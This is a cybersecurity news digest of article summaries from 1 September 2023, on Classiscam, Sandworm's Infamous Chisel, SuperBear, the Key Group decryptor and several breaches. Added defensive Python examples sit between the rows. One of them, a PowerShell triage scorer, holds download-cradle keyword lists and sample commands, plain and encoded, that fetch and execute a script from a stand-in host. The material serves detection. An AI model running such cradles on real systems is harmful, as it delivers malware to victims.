Daily Brief
Find articles below, see 'DETAILS' for generated summaries
| Timestamp | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2023-09-01 12:34:02 | bleepingcomputer | CYBERCRIME | Classiscam Fraud-as-a-Service Expands, Targets Banks and 251 Brands | The Classiscam scam-as-a-service operation is targeting banks and 251 brands worldwide.
Affiliates of Classiscam use phishing kits to create fake ads and pages to steal money, credit card information, and banking credentials.
Developers and affiliates split the proceeds, with the developers receiving 20-30% of the revenue.
Classiscam has grown significantly, with 90 Telegram channels selling scam kits, 38,000 registered members, and estimated total damage of $29 million.
The operation has made $64.5 million in combined earnings and is targeting users in 79 countries.
Targeting is heaviest in Europe, with Germany the most affected country.
Classiscam has become more automated, using Telegram bots to create phishing and scam ad pages.
The operation now includes fake bank login pages to steal e-banking account credentials. | Details |
| 2023-09-01 12:34:02 | bleepingcomputer | NATION STATE ACTIVITY | GRU Hackers Target Ukrainian Military with Android Malware | Hackers affiliated with the GRU, the Main Directorate of the General Staff of the Armed Forces of the Russian Federation, have been targeting Android devices in Ukraine with a new malware framework called 'Infamous Chisel'
The malware provides backdoor access through the Tor anonymity network, allowing hackers to scan local files, intercept network traffic, and exfiltrate data
Infamous Chisel primarily targets Android devices and scans for information related to the Ukrainian military, sending the data to the attackers' servers
The malware is capable of gathering hardware information, probing local area networks, and giving attackers remote access
Data exfiltration runs every 86,000 seconds (just under a day); the most critical military data is exfiltrated every 600 seconds (ten minutes)
The malware is not particularly stealthy and seems to prioritize quick data exfiltration and pivoting to more valuable military networks
The UK National Cyber Security Centre (NCSC) and the US Cybersecurity and Infrastructure Security Agency (CISA) have released reports on Infamous Chisel with technical details and indicators of compromise for detection and defence | Details |
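The fixed exfiltration cadence reported above (600 s for priority files, 86,000 s for the bulk run) is the kind of signal a network-side beacon check keys on. The block below is an added example for this brief, not code from the NCSC/CISA report or from the malware: it groups outbound connection records by flow and flags flows whose inter-connection gaps are nearly constant. The connection records, addresses and the `min_conns`/`max_cv` thresholds are constructed assumptions to be tuned against real traffic. Because the malware talks over Tor, the destination is a guard relay rather than the attackers' server, which is why the check scores the timing rather than matching a destination list.

```python
"""Periodic-beacon detection over outbound connection records.

Added example; not code from the NCSC/CISA Infamous Chisel report or the malware.
Records are constructed; min_conns and max_cv are assumptions to tune per network.
"""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

BASE = datetime(2023, 9, 1, 0, 0, 0)


def _rec(t, src, dst, dport):
    return {"time": t.isoformat(), "src": src, "dst": dst, "dport": dport}


# Constructed: one device contacts the same peer every ~600 s with a few seconds of
# jitter. Over Tor that peer is a guard relay, so the address itself carries no signal.
_JITTER = [0, 2, -1, 3, 0, -2, 1, 0]
SAMPLE_RECORDS = [
    _rec(BASE + timedelta(seconds=600 * i + j), "10.20.1.7", "203.0.113.9", 443)
    for i, j in enumerate(_JITTER)
]
# Constructed: the same device browsing normally (irregular gaps) to another host.
_BROWSE_GAPS = [0, 15, 340, 7, 1200, 55, 90, 20]
_t = BASE
for _g in _BROWSE_GAPS:
    _t += timedelta(seconds=_g)
    SAMPLE_RECORDS.append(_rec(_t, "10.20.1.7", "198.51.100.4", 443))


def find_beacons(records, min_conns=6, max_cv=0.15):
    """Return (src, dst, dport) flows whose inter-connection gaps are nearly constant.

    cv = stdev(gaps) / mean(gaps): a person browsing gives cv well above 1,
    a timer-driven implant gives cv close to 0.
    """
    flows = defaultdict(list)
    for r in records:
        flows[(r["src"], r["dst"], r["dport"])].append(datetime.fromisoformat(r["time"]))
    beacons = []
    for (src, dst, dport), times in flows.items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            beacons.append({"src": src, "dst": dst, "dport": dport, "count": len(times),
                            "period_s": round(statistics.median(gaps)), "cv": round(cv, 4)})
    return sorted(beacons, key=lambda b: b["cv"])


if __name__ == "__main__":
    for beacon in find_beacons(SAMPLE_RECORDS):
        print(beacon)
```

Run on the constructed records it reports only the 203.0.113.9 flow with a period of about 600 s. Legitimate software (update checkers, monitoring agents) also beacons, so in practice the output is diffed against an allowlist of known periodic flows rather than alerted on directly.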
| 2023-09-01 12:29:36 | theregister | CYBERCRIME | Microsoft Opposes Russia-led UN Cybercrime Treaty, Citing Potential Risks to Cybersecurity | Microsoft has joined other organizations in criticizing the draft version of the UN cybercrime treaty
The company warns that the proposal is vague and could lead to the criminalization of ethical hacking and security practices
Microsoft argues that the treaty could be used by authoritarian states to suppress dissent under the guise of fighting cybercrime
Microsoft says the treaty must protect ethical hackers and include language that explicitly permits lawful cybersecurity work
Microsoft also calls for increased transparency and aligning the treaty with existing data protection standards | Details |
| 2023-09-01 12:29:36 | thehackernews | DATA BREACH | The Seriousness of Compromised Credentials: Protecting Active Directory Environments | Stolen or weak usernames and passwords are one of the most potent weapons for cyber adversaries
Compromised credentials allow unauthorized access to networks and systems
Current security solutions struggle to distinguish between legitimate and malicious use of compromised credentials
Attackers use various techniques to obtain compromised credentials, including purchasing them from Dark Web marketplaces or using keyloggers
Active Directory (AD) environments are a prime target for attacks that use compromised credentials
AD's native authentication protocols (Kerberos and NTLM) have no built-in MFA, so an attacker holding valid credentials can move laterally between hosts without being challenged
Silverfort Unified Identity Protection offers comprehensive security for AD environments, including continuous monitoring, risk analysis, and active response
By implementing Silverfort, organizations can mitigate the risks associated with compromised credentials and enhance AD security posture. | Details |
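One heuristic that does separate legitimate from malicious use of a valid credential is fan-out: a single account authenticating over the network to many distinct hosts in a short window, which is what lateral movement looks like in Windows Security event 4624 (logon type 3 for network, 10 for RDP). The block below is an added example, not Silverfort's product logic or anything from the article. The events are constructed, and the window, host threshold and allowlist are assumptions to tune against an environment's baseline.

```python
"""Credential fan-out detection over Windows 4624 logon events.

Added example; not Silverfort's logic nor code from the article. Events are
constructed; window_minutes, min_hosts and ALLOWLIST are assumptions to tune per
environment (vulnerability scanners, backup and monitoring accounts fan out legitimately).
"""
from collections import defaultdict
from datetime import datetime, timedelta


def _ev(time, user, logon_type, src_ip, host):
    # Field names mirror 4624: TargetUserName, LogonType, IpAddress, Computer
    return {"time": time, "user": user, "type": logon_type, "src_ip": src_ip, "host": host}


SAMPLE_EVENTS = [
    # svc_backup: six network logons to six hosts in under three minutes, all from one workstation
    _ev("2023-09-01T02:14:05", "svc_backup", 3, "10.0.5.23", "FS01"),
    _ev("2023-09-01T02:14:30", "svc_backup", 3, "10.0.5.23", "DC01"),
    _ev("2023-09-01T02:15:02", "svc_backup", 3, "10.0.5.23", "HR-WS07"),
    _ev("2023-09-01T02:15:40", "svc_backup", 3, "10.0.5.23", "FIN-WS12"),
    _ev("2023-09-01T02:16:11", "svc_backup", 3, "10.0.5.23", "SQL02"),
    _ev("2023-09-01T02:16:40", "svc_backup", 3, "10.0.5.23", "MAIL01"),
    _ev("2023-09-01T02:17:00", "svc_backup", 2, "-", "FS01"),  # interactive logon, not counted
    # alice: an ordinary day, two hosts
    _ev("2023-09-01T09:00:10", "alice", 10, "10.0.7.41", "TS01"),
    _ev("2023-09-01T09:05:33", "alice", 3, "10.0.7.41", "FS01"),
    # jdoe: five hosts, but spread over eight hours
    _ev("2023-09-01T08:00:00", "jdoe", 3, "10.0.7.52", "FS01"),
    _ev("2023-09-01T10:00:00", "jdoe", 3, "10.0.7.52", "FS02"),
    _ev("2023-09-01T12:00:00", "jdoe", 3, "10.0.7.52", "PRINT01"),
    _ev("2023-09-01T14:00:00", "jdoe", 3, "10.0.7.52", "SQL02"),
    _ev("2023-09-01T16:00:00", "jdoe", 3, "10.0.7.52", "MAIL01"),
]

ALLOWLIST = {"vulnscan_svc"}  # assumption: accounts known to fan out legitimately


def detect_fanout(events, window_minutes=10, min_hosts=5, logon_types=(3, 10)):
    """Sliding window per account: alert when one account reaches >= min_hosts distinct
    targets within the window using network/RDP logons. One alert per account."""
    window = timedelta(minutes=window_minutes)
    per_user = defaultdict(list)
    for ev in events:
        if ev["type"] in logon_types and ev["user"] not in ALLOWLIST:
            per_user[ev["user"]].append(
                (datetime.fromisoformat(ev["time"]), ev["host"], ev["src_ip"]))
    alerts = []
    for user, rows in per_user.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:
                start += 1
            span = rows[start:end + 1]
            hosts = {h for _, h, _ in span}
            if len(hosts) >= min_hosts:
                alerts.append({"user": user, "from": span[0][0].isoformat(),
                               "to": span[-1][0].isoformat(), "hosts": sorted(hosts),
                               "sources": sorted({s for _, _, s in span})})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_fanout(SAMPLE_EVENTS):
        print(alert)
```

On the constructed events only `svc_backup` trips the rule; `jdoe` touches the same number of hosts but over a working day, which is why the window matters as much as the count. The `sources` field is worth surfacing in the alert: a service account fanning out from a user workstation is a stronger signal than the same account doing so from its usual backup server.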
| 2023-09-01 12:29:36 | thehackernews | CYBERCRIME | Russian State-Backed 'Infamous Chisel' Android Malware Targets Ukrainian Military | A mobile malware strain called Infamous Chisel is targeting Android devices used by the Ukrainian military
Malware enables unauthorized access, file scanning, traffic monitoring, and data theft
Malware attributed to Russian state-sponsored actor called Sandworm, associated with the Russian Main Intelligence Directorate's (GRU) Main Centre for Special Technologies (GTsST)
Sandworm known for disruptive and destructive cyber campaigns, including Industroyer, BlackEnergy, and NotPetya
Infamous Chisel contains multiple components for remote access and exfiltration of information from Android phones
Malware lacks obfuscation and stealth techniques, indicating low to medium sophistication
Another Kremlin-backed group, Gamaredon, is also targeting Ukrainian military and government entities with phishing attacks | Details |
| 2023-09-01 12:15:14 | theregister | MISCELLANEOUS | Toyota Japan Recovers from Production System Malfunction | Toyota Japan experienced a production system malfunction that halted production across 14 plants for 36 hours.
The automaker states that the malfunction was not caused by a cyber attack, but the cause is still under investigation.
Production resumed as planned on Wednesday.
Toyota has previously faced data leaks and other issues, but the incident is not expected to impact production volumes.
The company has some slack in its systems that can make up for the missed days of production.
This incident is not as severe as previous problems such as recalls due to wheels falling off cars. | Details |
| 2023-09-01 12:15:14 | theregister | NATION STATE ACTIVITY | Chinese Spies Maintain Control of Networks Through Barracuda Gateway Attacks | Chinese cyberspies compromised organizations worldwide through a vulnerability in Barracuda Email Security Gateway (ESG) appliances
Even after victims took action to secure their devices, the cyberspies may still have access through previously planted backdoors
Mandiant recommends replacing vulnerable Barracuda equipment
US government's Cybersecurity and Infrastructure Security Agency (CISA) released more indicators of compromise associated with the exploitation of the vulnerability
The Chinese espionage group tracked as UNC4841 deployed new malware to maintain its presence in high-priority targets
Approximately five percent of Barracuda ESG appliances were compromised worldwide
US and Canadian organizations were hit the hardest, with government agencies making up 27 percent of victims
Mandiant revealed a second wave of attacks using new malware families to maintain access to compromised environments. | Details |
| 2023-09-01 12:15:14 | theregister | NATION STATE ACTIVITY | Kremlin-backed Sandworm Strikes Android Devices with Data-Stealing Malware | Russia's Sandworm group, backed by the Kremlin, is using a malware strain called Infamous Chisel to remotely access Ukrainian soldiers' devices
Infamous Chisel allows the group to monitor network traffic, access files, and steal sensitive information from the devices
The Ukrainian security agency was able to detect and block Sandworm's latest campaign using Infamous Chisel to break into the army's combat data exchange system
Researchers have also discovered trojanized Signal and Telegram apps for Android that are part of a Chinese nation-state espionage campaign
The fake apps were found to contain the BadBazaar malware, which has been used in the past to spy on ethnic minorities
The UK National Cyber Security Centre, along with other international agencies, have confirmed Ukraine's reports of Sandworm's new mobile malware
Infamous Chisel is a collection of components that provides backdoor access via the Tor network, allowing for persistent spying on infected devices
Sandworm has previously launched other malware campaigns against Ukrainian targets, including ransomware attacks and destructive cyberattacks | Details |
| 2023-09-01 12:15:14 | theregister | RANSOMWARE | Free Decryptor Released for Key Group Ransomware Victims | A team of security researchers has released a decryption tool to restore files encrypted by the Key Group ransomware.
The decryptor only works on a specific version of the ransomware built around August 3.
The tool is available for free and was developed by exploiting cryptographic errors made by the ransomware gang.
Key Group ransomware derives its encryption key from a fixed password and a fixed salt, so the key is identical for every victim and a decryption routine only has to recompute it.
The gang's ransom note claims "military-grade" encryption and tells victims they must pay to recover their data.
Key Group has been characterized as a "low-sophisticated threat actor" and has been seen using public and private Telegram channels for their activities. | Details |
| 2023-09-01 12:15:14 | thehackernews | CYBERCRIME | Classiscam Scam-as-a-Service Raked $64.5 Million During the COVID-19 Pandemic | Classiscam scam-as-a-service program has earned criminals $64.5 million in illicit earnings since 2019
Scammers initially placed fake advertisements on classified sites and used social engineering techniques
The scam has become highly automated and can be run on various online platforms
Majority of victims are based in Europe, followed by the Middle East and Africa, and the Asia-Pacific
Classiscam encompasses 1,366 distinct groups on Telegram, targeting 79 countries and impersonating 251 brands
Scammers trick users into buying falsely-advertised goods or services through social engineering
Phishing pages are created using Telegram bots, and login credentials are harvested for fraudulent activities
Some groups have switched to stealer malware to harvest passwords and other data from victims' machines | Details |
| 2023-09-01 12:15:14 | thehackernews | CYBERCRIME | New SuperBear Trojan Emerges in Targeted Phishing Attack on South Korean Activists | A new phishing attack targeted civil society groups in South Korea
The attack led to the discovery of a remote access trojan called SuperBear
The attacker impersonated a member of the organization and sent a malicious LNK file to an activist
The LNK file executed a PowerShell command to fetch next-stage payloads from a compromised WordPress website
The payload was injected into a suspended instance of Explorer.exe
The SuperBear trojan establishes communication with a remote server to exfiltrate data and download additional commands and libraries
The malware is believed to be associated with a North Korean nation-state actor named Kimsuky
This is not the first time North Korean actors have targeted South Korean individuals and organizations | Details |
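The chain summarized above (a shortcut launching PowerShell, a download cradle pulling the next stage from a web host, then a suspended Explorer.exe used as the injection target) leaves two pivots in endpoint process-creation telemetry: a powershell.exe whose parent is explorer.exe and whose command line fetches and runs remote content, and an explorer.exe whose parent is a script host, which the real shell never has. The block below is an added example of scoring such events; it is not code from the article's analysis or from the SuperBear sample. Field names follow Sysmon event 1 (`ParentImage`, `Image`, `CommandLine`); the events, URLs and weights are constructed for the demo.

```python
"""Scoring process-creation telemetry for the LNK -> PowerShell -> injected Explorer chain.

Added example; not code from the article or from the SuperBear sample. Field names
follow Sysmon event 1; the events, URLs and score weights are constructed assumptions.
"""
import base64
import re

CRADLE_TOKENS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                 "net.webclient", "invoke-expression", "iex ", "iex(",
                 "start-bitstransfer", "invoke-restmethod")
EVASION_FLAGS = ("-nop", "-noprofile", "-w hidden", "-windowstyle hidden",
                 "-ep bypass", "-executionpolicy bypass", "-noni", "-noninteractive")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
# -e / -ec / -enc / -EncodedCommand followed by base64 of a UTF-16LE script
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
ALERT_THRESHOLD = 3


def decode_encoded_command(cmdline):
    """Recover the script behind -EncodedCommand so cradle tokens inside it are visible."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons). Weights are assumptions: a cradle, or an explorer.exe
    born from a script host, is strong on its own; the other signals only corroborate."""
    parent, image = _basename(ev["ParentImage"]), _basename(ev["Image"])
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = (cmd + " " + decoded).lower()
    score, reasons = 0, []
    if image in ("powershell.exe", "pwsh.exe"):
        if parent == "explorer.exe":
            score += 1
            reasons.append("powershell started from explorer.exe (shortcut/LNK path)")
        if any(t in text for t in CRADLE_TOKENS):
            score += 3
            reasons.append("download cradle in command line")
        if any(f in text for f in EVASION_FLAGS):
            score += 1
            reasons.append("hidden/no-profile/bypass flags")
        if decoded:
            score += 1
            reasons.append("encoded command decoded: " + decoded[:60])
    if image == "explorer.exe" and parent in SCRIPT_HOSTS:
        score += 3
        reasons.append(f"explorer.exe spawned by {parent}: candidate injection host")
    return score, reasons


def triage(events, threshold=ALERT_THRESHOLD):
    """Events at or above the threshold, highest score first."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["Seq"], score, reasons))
    return sorted(hits, key=lambda h: -h[1])


# Constructed sample events (the .invalid TLD is reserved and never resolves).
ENCODED = base64.b64encode(
    "IEX (iwr 'https://compromised-blog.invalid/s.ps1')".encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Seq": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://compromised-blog.invalid/wp-content/uploads/s.ps1')\""},
    {"Seq": 2, "ParentImage": PS, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\explorer.exe"},
    {"Seq": 3, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"Seq": 4, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -enc " + ENCODED},
    {"Seq": 5, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell.exe Get-Date"},
]

if __name__ == "__main__":
    for seq, score, reasons in triage(SAMPLE_EVENTS):
        print(seq, score, reasons)
```

Events 1 and 4 are the cradle (plain and base64-encoded), event 2 is the injection host, and event 3 shows why the explorer-parent signal alone is not enough: an admin double-clicking a shortcut to a local script produces exactly that parent/child pair.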
| 2023-09-01 12:15:14 | bleepingcomputer | MALWARE | Free Key Group ransomware decryptor helps victims recover data | Security experts at EclecticIQ have developed a decryption tool for Key Group ransomware
The tool works for versions of the malware built in early August
The ransomware uses a static salt in its key-derivation scheme, so the encryption key can be recomputed and the encryption reversed
Key Group is a Russian-speaking threat actor that has attacked various organizations and uses private Telegram channels for ransom negotiations
The ransomware appends the .KEYGROUP777TG extension to encrypted files and deletes Volume Shadow Copies to prevent system restore
Users can run the Python decryption script to search for and decrypt files with the .KEYGROUP777TG extension, but should back up their data before doing so
The release of the decryptor may prompt Key Group to improve the security of its ransomware | Details |
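Both Key Group entries above (the Register's and BleepingComputer's) turn on the same flaw: the key is derived from a hard-coded password and salt, so it is a constant, and anyone who recovers those two values from the binary can decrypt every victim's files. The block below is an added example of that failure and of the safe shape of a decryptor (filter on the reported extension, never overwrite); it is not EclecticIQ's decryptor and contains nothing from the Key Group sample. The password, salt and iteration count are placeholders, and the cipher is a stand-in keystream built from HMAC-SHA256 in counter mode rather than the block cipher the real ransomware uses: the weakness demonstrated is in key derivation, and any cipher keyed from a constant key is broken the same way.

```python
"""Why a ransomware keyed from a FIXED password and FIXED salt is decryptable by anyone.

Added example; not EclecticIQ's decryptor and not Key Group's code. FIXED_PASSWORD,
FIXED_SALT and ITERATIONS are placeholders (assumptions, not the gang's values). The
keystream cipher stands in for the real block cipher; the flaw lives in the KDF inputs.
"""
import hashlib
import hmac
import os
import struct
import tempfile
from pathlib import Path

FIXED_PASSWORD = b"demo-static-password"   # assumption: placeholder, not the real password
FIXED_SALT = b"demo-static-salt"           # assumption: placeholder, not the real salt
ITERATIONS = 10_000                        # assumption
EXTENSION = ".KEYGROUP777TG"               # extension reported in the article


def derive_key() -> bytes:
    """PBKDF2 over constant inputs yields the same 32-byte key on every run and every
    victim machine: derive it once, decrypt everything."""
    return hashlib.pbkdf2_hmac("sha256", FIXED_PASSWORD, FIXED_SALT, ITERATIONS, dklen=32)


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream from HMAC-SHA256 (stand-in for the real cipher)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + struct.pack(">Q", counter), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def encrypt(plaintext: bytes, key: bytes, nonce: bytes = b"") -> bytes:
    """What the malware does: a fresh per-file nonce, but always the same key."""
    nonce = nonce or os.urandom(16)
    ks = _keystream(key, nonce, len(plaintext))
    return nonce + bytes(a ^ b for a, b in zip(plaintext, ks))


def decrypt(blob: bytes, key: bytes) -> bytes:
    nonce, ct = blob[:16], blob[16:]
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct))))


def decrypt_tree(root: Path, key: bytes) -> list:
    """Decrypt every *.KEYGROUP777TG file under root, writing the plaintext beside it.
    The encrypted file is left in place and an existing output is never overwritten,
    which is the practical form of the 'back up first' advice."""
    restored = []
    for enc_path in root.rglob(f"*{EXTENSION}"):
        out = enc_path.with_name(enc_path.name[:-len(EXTENSION)])
        if out.exists():
            continue
        out.write_bytes(decrypt(enc_path.read_bytes(), key))
        restored.append(out)
    return restored


def demo() -> dict:
    """Self-check: encrypt two constructed files, then recover them with a recomputed key."""
    samples = {"report.docx": b"quarterly numbers", "notes.txt": b"meeting notes"}
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        for name, data in samples.items():
            (root / (name + EXTENSION)).write_bytes(encrypt(data, derive_key()))
        restored = decrypt_tree(root, derive_key())   # a second derivation, same key
        return {p.name: p.read_bytes() for p in restored}


if __name__ == "__main__":
    print(demo())
```

The per-file nonce does not help the gang: it only prevents two identical files from producing identical ciphertext, while the key that matters is the same everywhere. The fix on the attacker's side would be a per-victim random key wrapped with a public key, which is why the decryptor's release is expected to prompt a rewrite.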
| 2023-09-01 12:15:14 | bleepingcomputer | DATA BREACH | LogicMonitor Customers Hacked in Reported Ransomware Attacks | LogicMonitor, a network monitoring company, confirms cyberattacks on some users of its SaaS platform
The hacking campaign has affected a small number of users
Anonymous sources reveal that threat actors hacked customer accounts, created local accounts, and deployed ransomware
Ransomware was deployed through the platform's on-premises LogicMonitor Collector agents
The attacks targeting LogicMonitor's customers occurred last week
LogicMonitor is investigating technical abnormalities impacting customer accounts
Weak default passwords assigned by LogicMonitor to new users were exploited in the attacks
LogicMonitor is sharing minimal information with users about the incidents | Details |
| 2023-09-01 12:15:14 | bleepingcomputer | NATION STATE ACTIVITY | North Korean Hackers Behind Malicious VMConnect PyPI Campaign | North Korean state-sponsored hackers are behind a campaign that uploaded malicious packages to the PyPI repository
The packages impersonated popular projects such as vConnector, the VMware vSphere connector module
The campaign is attributed to Labyrinth Chollima, a subgroup of the North Korean Lazarus group
The malicious packages featured minimal differences from the originals and contained a malicious function for data collection
Data collected from infected machines is sent to the attacker's command and control servers
The campaign is linked to Lazarus based on evidence such as the payload decoding routine found in the malicious packages
Attribution confidence is high because of similarities to malware previously linked to other Lazarus subgroups | Details |
| 2023-09-01 12:15:14 | bleepingcomputer | DATA BREACH | Forever 21 Data Breach Exposes Personal Information of 500,000 Individuals | Forever 21, a clothing and accessories retailer, suffered a data breach that exposed the personal information of over 500,000 individuals
Hackers had intermittent access to Forever 21 systems between January and March, and stole select files during this time
The breach primarily affected current and former Forever 21 employees, not customers
Forever 21 has taken steps to ensure the stolen data has been erased, indicating potential communication with the attackers
There is no confirmation of a ransomware attack, and the company believes the risk to exposed individuals is low
Impacted individuals will receive instructions on enrolling in a free 12-month fraud and identity theft protection service
This is not Forever 21's first data breach: in 2017 it notified customers of a breach that exposed payment card data from transactions made between March and October of that year | Details |